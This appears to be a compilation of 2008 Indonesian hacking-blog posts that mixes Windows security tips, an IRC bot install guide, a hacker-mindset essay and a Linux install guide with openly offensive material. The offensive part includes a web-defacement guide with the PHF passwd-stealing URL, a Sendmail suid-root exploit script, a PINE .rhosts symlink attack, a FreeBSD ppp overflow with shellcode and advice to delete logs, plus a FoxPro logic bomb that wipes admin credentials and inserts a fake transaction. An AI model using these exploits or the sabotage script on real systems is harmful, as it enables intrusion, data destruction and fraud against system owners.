Windows. Dapat dibayangkan semisal di direktori ini terdapat program atau shortcut yang
me-link ke screen saver yang mengandung password yang tidak kita ketahui passwordnya, karena
mungkin dibuat oleh seseorang yang usil dengan komputer kita. Untuk itulah sebaiknya dihapus
saja program - program yang ada di direktori ini terlebih yang tidak kita ketahui asal -
usulnya.

4. Menginstall Program Enkripsi.
Untuk keamanan komputer pada tingkat file, pembaca dapat menginstall program - program enkripsi
data. Program - program enkripsi data semacam ini telah banyak beredar dimana - mana dan
prinsip kerjanya juga kurang lebih sama, yaitu user memilih file yang akan dienkripsi kemudian
menulis passwordnya dan terakhir menyimpan file tersebut. Untuk membukanya user akan dimintai
password terlebih dahulu. Bagi pembaca yang ingin mencoba menggunakan program enkripsi buatan
lokal dapat mendownload program CaroX 2000 Bharathayudha version yang memuat fitur untuk
enkripsi file. Meski lokal, tetapi cukup memadai untuk mengenkripsi data kita. Program tersebut
dapat diperoleh di situs DigitalWorks di http://come.to/digitalworks.

5. Buat Folder Tersembunyi Dengan Kode ASCII
Saran selanjutnya yaitu dengan menyimpan file - file yang bertipe rahasia ke suatu folder /
direktori yang dibuat dengan kode - kode ASCII. Kiat ini masih jarang digunakan namun cukup
handal. Alasannya karena kode ASCII sendiri berjumlah ratusan dan sulit untuk menghapal
semuanya. Alasan kedua; ada sebagian kode ASCII yang bila digunakan untuk membuat direktori /
folder, maka direktori tersebut tidak dapat diakses lewat Windows Explorer, ia hanya nampak
sebagai sebuah folder tanpa nama dengan garis bawah. Sehingga operasi file dari dan ke
direktori tersebut hanya bisa diakses lewat modus Dos dan untuk berganti ke direktori yang
dibuat dengan kode ASCII tersebut harus mengetikkan kombinasi kode ASCII-nya dengan pas.
Sehingga dapat berfungsi semacam password.
Untuk membuat folder semacam ini caranya seperti diterangkan dalam contoh berikut :
· Booting ke modus Dos atau dari Windows panggil program Ms Dos prompt
· Aktifkan tombol Num Lock pada keyboard
· Ketikkan perintah berikut secara berurut pada Dos prompt c:\ :
Md
(spasi)
ALT + 456
(lepas tombol ALT)
ALT + 741
(lepas tombol ALT)
baru
(tekan tombol Enter)

Untuk perintah ALT + 456 maksudnya tekan tombol keyboard ALT dan jangan dilepas, kemudian
tekan tombol keypad (dikanan keyboard) secara berurut : 4, 5, 6. Untuk lebih jelasnya lihat
gambar 1.
· Hasilnya adalah sebuah direktori dengan nama yang terdiri dari 6 karakter. Direktori
ini dapat dilihat dengan Windows Explorer, tetapi tidak dapat diakses. Pembaca dapat
bereksperimen dan berkreasi dengan kode ASCII yang lain. Operasi file baik copy, move,
delete, dll, dilakukan lewat modus Dos.

Gambar 1.
Membuat folder dengan kode ASCII

6. Menyimpan Dokumen Dengan Password To Open atau To Modify
Simpan file dokumen yang kita buat dengan menggunakan password. Program Microsoft Word dan
Excel telah menyertakan fasilitas ini. Password to open maksudnya program akan meminta kita
mengisikan password sebelum dokumen dibuka, bila password salah, maka dokumen tidak akan
dibuka. Password to modify maksudnya dokumen dapat dibuka tanpa password, tetapi untuk mengubah
isi dokumen tidak diperbolehkan kecuali setelah mengisikan password dengan benar. Pada
Microsoft Word dan Excel 2000 password to open dan to modify dapat dipasang pada saat kita akan
menyimpan dokumen. Yaitu dengan memilih menu File | Save As. Kemudian pada kotak dialog
Save As klik tombol Tools | General Options. Pembaca tinggal mengisikan passwordnya. Untuk
sekuriti yang baik isilah password to open dan to modify sekaligus dan aktifkan juga pilihan
Read-only Recommended.

Gambar 2.
Kotak dialog untuk mengisi password

7. Menghapus File Dengan Aman
Kita mungkin terbiasa dengan menghapus file dengan cara - cara yang telah umum. Seperti
menekan tombol keyboard 'del' atau 'Shift' + 'del' atau dengan mengklik kanan mouse kemudian
memilih delete. Dengan cara tersebut memang dapat 'menghapus' file, tetapi perlu pembaca
ketahui bahwa telah banyak program yang dapat 'membangkitkan' file yang telah dihapus dengan
fasilitas Undelete. Contohnya seperti Norton Unerase. Dapat dibayangkan bila file - file
perusahaan yang rahasia yang tidak terpakai lagi yang kita tahu telah kita 'hapus' dan
ternyata file tersebut dapat di-undelete oleh saingan perusahaan tersebut. Berarti perusahaan
lawan tersebut telah mendapat data yang amat berharga.
Untuk itulah penulis sarankan agar pembaca menginstall program yang dapat menghapus file dengan
sebenar - benarnya. Atau bila ingin yang mudah, kita cukup membuka dokumen tersebut - misalnya
dokumen Word, kemudian pilih Select All dan hapus dokumen tersebut. Setelah itu simpan dengan
nama yang sama atau dengan memilih menu Save (bukan Save As). Dalam hal ini berarti pembaca
telah menyimpan suatu dokumen yang kosong. Akhirnya hapus file tersebut. Bila ternyata file
yang telah dihapus itu dapat dibangkitkan dengan Undelete, maka dia akan mendapati dokumen yang
telah kosong. Praktis dan aman.

8. Memblok Pengaksesan Registry Windows.
Hal yang tidak kalah pentingnya adalah memproteksi pengaksesan registry. Tujuannya adalah untuk
menghindari modifikasi registry dari tangan - tangan jahil. Sebagaimana kita ketahui bahwa
setting - setting program yang ada di Windows terletak di registry. Boleh dikatakan bahwa
registry adalah 'nyawa' dari Windows itu sendiri. Bila registry rusak, maka Windows tidak akan
berjalan secara normal.
Ikuti cara berikut untuk memblok registry Windows :
· Buka registry dengan Regedit dengan cara mengklik Start | Run. Ketik 'regedit' pada
kotak dialog dan klik tombol Ok.
· Buka key berikut : Hkey_Current_User\Software\Microsoft\Windows\
CurrentVersion\Policies\System
· Pilih menu : Edit | New | DWORD Value
· Beri nama dengan 'DisableRegistryTools', kemudian beri nilai '1'.
Sekarang tidak ada lagi yang dapat bermain - main dengan registry, karena registry telah
diproteksi.

Demikianlah beberapa saran - saran yang dapat pembaca praktekkan untuk meningkatkan sekuritas
komputer di Windows 9x. Meskipun semua ini bukan suatu pengamanan yang sempurna, setidaknya
kita telah berusaha untuk 'merepotkan' orang - orang yang akan menjebol sistem kita. Siapa
tahu mereka urung meneruskan niat jeleknya.

-----^v^-----

Install font dengan lebih cepat

2008-06-07T04:32:00.001-07:00

Install font dengan lebih cepat

Untuk menginstall font biasanya kita harus mengikuti langkah yang panjang : Start > Settings > Control Panel > Font. Lalu dari situ Anda harus klik File > Install New Fonts. Cara tersebut tentunya sangat menjengkelkan. Sebenarnya ada cara yang lebih mudah, yaitu :

Cara pertama :

1. Buka registry editor.
2. Pindah ke key "HKEY_CLASSES_ROOT\TTFFILE\SHELL".
3. Pilihlah perintah "Edit > New > Key" dan berikanlah nama "Install Fonts" pada key yang baru diletakkan tadi.
4. Klik ganda pada bagian jendela kanan pada entry "(Default)".
5. Berikan nilai "Value"-nya "Install Font" dan konfirmasikan perubahan ini dengan mengklik "OK".
6. Tandai sekali lagi subkey "Install Font" dan di dalamnya dengan menggunakan perintah "Edit > New > Key".
7. Buatlah sebuah subkey baru yang dinamakan "command".
8. Klik ganda pada "(Default)", berikan pada "Value"-nya perintah "c:\windows\command\xcopy32.exe %1 c:\windows\fonts".

Sekarang jika Anda mengklik kanan pada file *.ttf akan muncul menu Install Fonts. Jika anda memilih menu ini, maka file font tersebut akan di-copy ke dalam folder Windows anda.

Cara kedua :

1. Buat shortcut yang menunjuk ke directory font pada Windows Anda (C:\Windows\Fonts).
2. Letakkan shortcut tersebut pada directory Send To.

Sekarang untuk menginstall font, klik kanan pada file *.ttf, pilih Send To > Fonts.

Instalasi Bot

2008-06-07T04:31:00.001-07:00

Di sini saya akan memperkenalkan tentang bot dan lama hal ini yang berhubungan dengan eggdrop , pasti deh anda sudah mengenal dengan bot atau Eggdrop dan malahan sudah ada yang bosen dengan bot atau eggdrop .Sebelum kita berbicara mengenai bot, Saya akan menjelaskan apa itu Bot atau Eggdrop.

Eggdrop is an IRC bot, written in C. If you don't know what IRC is, this is probably not whatever you're looking for. Eggdrop, being a bot, sits on a channel and takes protective measures: to keep the channel from being taken over (in the few ways that anything can), to recognize banished users or sites and reject them, to recognize privileged users and let them gain ops, etc.
One of the more unique features of Eggdrop is its "party line", accessible via DCC chat and telnet, which allows you to talk to other people lag-free. Consider it a multi-way DCC chat, or a miniature IRC (complete with channels). You can link up with other bots and expand the party line until it actually becomes something very much like IRC, in fact.
Eggdrop is always being improved and adjusted because there are bugs to be fixed and features to be added (if the users demand them, and they make actually sense). In fact, it existed for several years as v0.7 - v0.9 before finally going 1.0. This version of Eggdrop is part of the 1.6 tree. A valiant effort has been made to chase down and destroy bugs.

Setelah kita mengetahui apa itu enggdrop, saya akan memberikan cara termudah untuk menginstall eggdrop tersebut, Dan eggdrop ada beberapa macamnya, ada yang di install pada shell linux/unix , windows dan Juga Dalam bentuh bahasa PHP / PHP bot. dan di sini saya hanya mengajarkan / memberitahu cara penginstalan Bot melalui shell dan Juga dalam Webserver (yang berkaitan dengan PHP Bot )

Cara pengistalan Bot melaui shell unix/linux .

•Download bot tersebut http://geocities.com/medan_hack1/tools/bot/bot.tar.gz

•tar -zxvf /bot.tar.gz

•cd .bot ;./config a.txt ( config file ) nick ident IP chanel owner

contoh : ./config a.txt hacker hacker 192.1.54.25 gnome-x NEO_DOANK

•setelah itu ketik ./ss untuk mendapatkan file egg

•dan jangan Lupa tekan ctrl + c ( ^c ) untuk menghentikan proses jika eror

•setelah terdapat file egg ketik ./egg -m a.txt

•Lihat pada Channel anda ( Pada server dalnet )

Saya Juga memeiliki file-file TCL Keren Abiss deh yang sudah di Masukkan satu paket pada file Yang telah anda download tadi di http://geocities.com/medan_hack1/tools/bot/bot.tar.gz ., di mana file-file TCL itu Hasil modifikasi atau Buatan saya sendiri ? , Jika anda Tidak Puas dengan File yang telah terdapat pada bot.tar.gz maka anda Bisa Mendownload File – file TCl yang keren ABiss deh cotoh nya file

Antidcc.tcl yang berfungsi sebagai pengaman anda dari Gangguan orang yang meremot Bot anda,
cewe.tcl (khusus cewe ) dan di kombinasikan dengan file chat.tcl ( khusus Laki-Laki ) di mana bot akan berkomunikasi / berbicara tentang cinta antara satu dengan Yang lain,
scan.tcl adalah file tcl yang akan melakukan scanning terhadap proxy dan Juga Virus User yang akan masuk ke dalam Channel anda,
bw.tcl adalah file yang dapat melihat trafik banwith service internet anda,
Bot yang ter pasang File ircorp.tcl tersebut akan menyampaikan kepada Master / admin bot tersebut adanya IRCCORP yang masuk ke dalam channel anda. Dan masih banyak Lagi TCL yang keren-keren Abiss, contohnya bot yang dapat menjawab perkataan orang dan lain-lain !!!! .Download di http://geocities.com/medan_hack1/tools/bot/neo.tcl.tar.gz .
Cara penginstalan TCL tersebut :

•Download terlebih dahulu di http://geocities.com/medan_hack1/tools/bot/neo.tcl.tar.gz , dan jangan Pindah ke direktori .bot/scripts/ tetapi anda tetapi saja berada di directory .bot

•Setelah itu itu tar file tersebut neo.tcl.tar.gz

•Gzip file . decompress.gz dan setup.gz setelah terdapat file decompress.gz dan setup

•Ketik ./setup dan tunggu beberapasaat dan akan muncul pesan SUCCSESS
Nb : anda harus mempunyai file a.txt b.txt dan c.txt karena file setup akan langsung menambahkan file .tcl kedalam file a.txt b.txt dan c.txt tersebut.

PHP Bot .

PHP bot serupa dengan eggdrop perbedaannya eggdrop di install pada shell Linux/unix sedangkan PHP bot Hanya dapat di install pada pHP yang berjalan pada webserver, dan Persyaratan Menginstall PHP bot ini adalah anda harus mempunyai website ( banyak tuh free Hosting Yang bisa PHP contoh: Lycos.co.uk dan Masih banyak Lagi) Adapun cara-cara penginstalan adalah SBB :

•Download file tersebut di http://geocities.com/medan_hack1/bot/deombot.zip

•Unzip file tersebut dan editlah file-file *.php ( Khusus semua file PHP ) Yang harus anda ganti Nick, ident, server, port, channel, owner , pass

•Setelah itu upload pada website anda dan setelah itu Buka browser anda dan Browsinglah ke http://domain-anda.com/bot-anda.php

Have Fun !!!!!

Ok deh sekian dulu Semua Cerita panjang Saya Ini Semoga anda tidak bosan-bosan terhadap saya :D

Jagan Lupa Neh Kunjungi http://geocities.com/medan_hack1/tools <========= untuk mendownload semua tools yang Lo idam-idamkan mulai dari exploit, Bot ... etc :D
Dan tidak ketinggalan http://k4hmi.tk

Thanks To My Crew

hackpage

2008-06-07T04:27:00.001-07:00

Hacking Webpages
The Ultimate Guide
By Virtual Circuit and Psychotic

Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well.

Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need.
It's best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I'm going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi

and now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting
the respective lockfile.

Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

now on to another one, this will be the last one that I'm going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on
FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up:

#include
#include
#include

#define BUFFER_SIZE 156 /* size of the bufer to overflow */

#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i);
ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;
*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);
}

Now that you've gotten root "what's next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worstJ Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learing ethnical hacking that you download our Unix Bible.

~~PSYCHOTIC~~

hackmind

2008-06-07T04:26:00.001-07:00

So you wanna be a HACKER huh? It's a state-of-MIND!
..you can induce it - but only if you are willing to drive yourself
mad enough! Go read and practice until you have mastered at least
Assembly language and Intermediate Level Electronics! Without this
foundation you'll be just another little geek, who might know the magic
words to the spell but dosent understand what he's doing! So RTFM!
..so what does that mean? Read The Fucking Manual! You will be sooo
amazed at how easy most things are if you just try to read the manual
first! The truth is: Most people cant read. Or they read poorly if
they read at all. So if you can't really read...STOP RIGHT HERE. GO
learn to read first. If you can't read at a minimum 12th Grade level
you cant be a hacker. Reading is the basic skill you must have to do
EVERYTHING BEYOND THIS POINT.

Tell your friends you cant party...you're busy. Spend at least 4
hours a day at your new-found fascination...or decide right here
and now that you cant cut it! If you CAN, get a copy of MINIX or
LINUX...start learning about OPERATING SYSTEMS. Then start your
1st real hack...try building a computer-controlled, DTMF dialer
card for your cheap PC...write the code to use it with, make it
a TSR to keep life interesting...now port it to MINIX or whatever
...better yet, port it as an IOCTL call at kernel level! You keep
reading...

Now you're ready to take on something more complex - go to the
Library, start a literature search; topic: Telephone Technologies.
RTFM! Learm about the ancient cross-bar, the Pre-ESS systems, the
fab MFTSS, the TELEX boxes and circuits...keep reading...buy up
an older, cheap (like under $50) cellular phone...by this time
you should already have a subscription to 'Nuts & Volts" as well
as a few other grassroots technology pubs....buy a copy of the
"Cellular Hacker's Bible"....start by doing something simple..
..disassemble and re-write the phone`s control ROM to allow it
to function as an 800MHZ scanner...hopefully you've assembled
a large array of tools and test gear by now. You've got a good
dual-trace scope, some pc-based PROM burner, a signal generator,
a logic probe or two, maybe even a microprocessor-emulator for
the 5051, the Z80, the 68010 or something....you may have been
dragged into some fields-afar by life - incorporate them: If
somebody drasgged you into SCUBA, build your own sonar. If you
have gotten interested in amateur radio, you can build a lot
of swell stuff...I recommend you checkout Packet's AX25A level2
protocol...very slick stuff! If your bud's are all into motors,
take a whak at doing your own Performance PROMS for GM's F.I. and
spark advance curves...or try adapting some Volkswagen/BOSCHE
Kjetronics F.I. to a Harley Davidson!..maybe you're into music
so you buy a synthesizer and learn all about electronic music,
you start hacking analog modules and build a nicer synth than you
could buy! Then you interface it to a MIDI port on a cheap 286AT
and then hack up some sequencer software, or buy some and then
disassemble it to fix all the bugs! You keep reading...

By now most of your friends are also "far into the pudding", you
have either gained 50 lbs or gone totally skinny...your skin tone
is 2 shades lighter from being indoors so long...most of the opposite
sex is either totally freaked by or with you - they either dig you,
or they dont!...you're probably knocking on the door of what will
be a $60K+/yr job as a systems analyst...and you are well-aware that
90% of the people in this world can't talk their way out of a badly
cooked steak at the local eatery, let alone install a new motherboard
in their PC! So you pick up some extra cash on doing shit like that
for the straights...you keep reading, and RTFM'ing higher and higher,
learning about networks...the VCR breaks down and your SO bitches
about having to wait till monday to have it fixed...you fix it in
about 40 minutes....the next day the clothes dryer starts to make
squeeking noises like a 50' mouse, you've never fixed one before -
but somehow it's not that difficult to open the bastard up and find
the squeek and fix it...and suddenly it dawns on you that hacking
code or hardware is pretty much the same! You keep reading...

Congrats, you are now a real hacker. Absolutly nothing but a lack of
time (or in some cases money) can stop you. You are a true Technologic
Philosopher...you can function in places a mere Engineer or Scientist
would truly FEAR TO TREAD! You can read better than Evelyn Wood, you
have a collection of tools that would make a Master Machinist and a
Prototype EE or ME cry. You can calculate series and parallel resonant
circuits in your head. You can fix any consumer appliance - if you can
get the parts. Your car has either become one of your main hacks or
you'ver deligated the job to a mechanic who you have found to be a
fellow hacker; and you work on his homebrew 68010 unix box...because
you've got a 68010 emulator and he works on your car because that's
the kind he specializes in! Maybe you trade services with people
for 50% of what ordinary people have to BUY WITH CASH!...you keep
reading...

(this is the stage where the author now finds himself...16 years
into a career at a Fortune 5 company and age 42...still reading...
your mileage may vary! <-((that's my code too! I co-wrote VEEP,
(vehicle-economy-emissions-program, a complete auto-simulator,
written in Fortran-5 for the Univac 1108 system using punch-cards!)
for the Ford Foundation and the DOT while at JPL in 1973)) )

-Avatar-> (aka: Erik K. Sorgatz) KB6LUY +----------------------------+
TTI(es@soldev.tti.com)or: sorgatz@avatar.tti.com *Government produces NOTHING!*
3100 Ocean Park Blvd. Santa Monica, CA 90405 +----------------------------+
(OPINIONS EXPRESSED DO NOT REFLECT THE VIEWS OF CITICORP OR ITS MANAGEMENT!)

.

Hacking database visual foxpro

2008-06-07T04:25:00.002-07:00

Artikel ini 100% murni untuk pembelajaran dan jika artikel ini menjadi sumber ide untuk menghancurkan database tempat kerja anda, itu diluar tanggung jawab penulis. Sebenarnya ide dari cara ini yaitu dng pemanfaatan akses tombol yang diberikan Visual Foxpro.

Syarat mutlak untuk dapat membuat ide ini berhasil yaitu program ini dibuat oleh anda sendiri sehingga anda dapat menambahkan script yang merusak tersebut. Sekarang kita mulai melihat script dari visual foxpro tsb :
Source program ini ditaruh di KEYPRESS, dan ditaruh pada awal tampilan atau pada login admin.

ON KEY LABEL CTRL+HOME SELECT ADMIN
DELETE ALL
INSERT INTO ADMIN(USER,PASSWORD) VALUE (“CAPIL”,”BALIHACK”)
SELECT ADMIN
SELECT TRANSAKSI
INSERT INTO TRANSAKSI (NAMA,JUMLAH_UANG) VALUE (“CAPIL”,”100000000”)

Pembahasan : Program akan bekerja apabila ada operator (atau anda sendiri yg menekan...he...he..) yg menekan tombol SHIFT+HOME. apabila ada yg menekan tombol tersebut seluruh isi tabel ADMIN akan terhapus dan secara otomatis akan diisi dengan value baru yaitu USER = CAPIL dan PASSWORD = BALIHACK. Sehingga apabila operator login, akses akan ditolak krn user dan password telah diubah.USER dan PASSWORD adalah field dari tabel ADMIN. Selanjutnya program akan memanggil tabel TRANSAKSI dan akan menambah transaksi secara otomatis dan tidak tanggung2 nilai nominal yg dimasukkan adalah Rp. 100.000.000, tentu saja itu akan membuat instansi anda akan pusing tujuh keliling dan merontokkan rambut mereka.

Ini hanya ide dasar dari pengerusakan tersebut, tentu saja ini masih jauh dari yg diharapkan dan apabila ada temen2 yg mengembangkan dengan cara yg lebih kejam misalnya dengan menambahkan waktu modifikasi menjadi 1 hari setelah penekanan tombol itu sehingga tidak akan ada yg curiga. Penulis angkat tangan dan tak mau ikut campur.

Memang tidak dapat dipungkiri ada beberapa programer usil yang bekerja pada perusahaan atau instansi tertentu yg menggunakan cara ini. Kenapa mereka melakukan itu, mungkin alasan yang paling mendasar adalah balas dendam. Mereka takut bila suatu saat mereka dipecat, mereka tidak bisa memberi oleh oleh yg layak untuk perusahaan tsb,misal dng penghapusan transaksi atau menformat komputer mereka hanya dengan menekan beberapa tombol.

“GUE DIPECAT, DATABASE JUGA DIPECAT DARI SISTEM”
Mungkin itu MOTTO mereka, saya yakin anda tidak mau melakukan hal tersebut krn pekerjaan itu tidak ada baiknya. Saran saya untuk hal ini adalah sebelum program resmi dipakai sebaiknya cek dulu listing program tsb dan backup selalu data anda tidak hanya pada satu tempat.

hackfromlinux

2008-06-07T04:25:00.001-07:00

Installing & Hacking From Linux...

All you people that thought you were good hackers, because you could fool
dumb sysadmins, and do a bit of social engineering, or hack something by
following someones carefully prepared text file. Well you're about to get
fucked if you read this text file you will find out that you are a hacker
but, the only thing you can do is use someone elses ideas. So with that in
mind here goes.
I wrote this text file because i know a lot of people who could
benefit from learning to use linux, especially when hacking.
First of all you need to get linux installed on your system so goto
http://www.redhat.com I would suggest you invest $40 in buying the newest
version of RedHat linux this way you will get all the files you want/need
on one cd. If you have a problem with paying that price, then contact me
and i will ship you a copy for half that price, yes only $20! If you are
really cheap (like me :-) you could try and download it, i have gotten it
to work before but it's really not worth the wait, i spent a total download
time of about 3 days to download all the files i wanted, and if one of the
files dosn't work, well you're pretty much fucked. Whatever you decide to
do, weather it's purchasing a copy from me or from redhat.com, or being
cheap :-) and downloading it, you should read the linux documentation
project especially the installation part, it will save you hours of worry.
I will touch down very briefly on what you have to do to install linux, but
not nearly enough for you to understand the installation. Many people will
tell you not to buy RedHat products because they're full of bugs, this is
true, and I couldn't agree more, but the bugs are present if you're trying
to hack teh box, so in this case just get RedHat Linux, since it's by far
the most user friendly and the easiest to install. On the other hand if you
are intending to run a sophisticated webserver do NOT get redhat, get
something like slackware, or debian linux.
If you are planning to use linux to access the net etc... you will
need to read the FAQ on compatability at http://www.redhat.com, i currently
don't know of any distribution of linux that supports winmodem or any other
type of modem that uses windows software to speed it up, these modems are
generally those yukky U.S robotics modems.
From now on I'm assuming you either purchased RedHat linux from me
or from RedHat. O.K lets get started, you will need to partition your
harddrive, to do this goto dos and type in fdisk choose no. 4 to view current
partitions. If you have one large partition that fills your whole harddrive
just reserved for windows then once again you're fucked. You need to back up
all your shit, before performing the steps below. Once everything is backed
up go to dos yet again and type 8in fdisk, now you need to delete your
current partition and set a new primary partition the primary partition
should not fill your whole harddrive, leave as much space as you want
unpartitioned, this unpartitioned space is what you're going to be putting
linux on. So now thats done restore your old windows shit and make sure
everything is working nice and dandy. Now pop in your redhat cd in your
cd-rom drive, and reboot your system. Follow the instructions until you
get to a screen that asks if you wish to use fdisk or disk druid to partition
your harddrive, just choose disk druid, now you need to set up a native linux
partition i recommdn 500 megs, but if you wanna be fancy put about 800 megs.
